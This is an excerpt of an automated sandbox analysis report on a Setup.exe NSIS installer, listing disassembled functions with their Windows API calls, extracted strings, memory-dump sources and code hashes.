GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

/D=, xrefs: 004039A6
NSIS Error, xrefs: 004038E2
_?=, xrefs: 00403A64
\Temp, xrefs: 00403A1B
Error launching installer, xrefs: 00403A7D
1C, xrefs: 00403B56
NCRC, xrefs: 0040397C
~nsu.tmp, xrefs: 00403AF7
SeShutdownPrivilege, xrefs: 00403C16

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 00406A53
@%F, xrefs: 0040682C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename: %s, xrefs: 004018F8
Call: %d, xrefs: 0040165A
Aborting: "%s", xrefs: 0040161D
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Jump: %d, xrefs: 00401602
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Sleep(%d), xrefs: 0040169D
detailprint: %s, xrefs: 00401679
SetFileAttributes failed., xrefs: 004017A1
Rename failed: %s, xrefs: 0040194B

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEd20, xrefs: 00405B9D
.exe, xrefs: 00405A3D
@%F, xrefs: 004059F6
_Nb, xrefs: 00405AD1
B%F, xrefs: 00405A1F
.DEFAULT\Control Panel\International, xrefs: 00405999
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEdit20A, xrefs: 00405BB6, 00405BBB
RichEd32, xrefs: 00405BA8
@rD, xrefs: 00405965
RichEdit, xrefs: 00405BC4

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,148,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,148,148,00000000,00000000,148,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
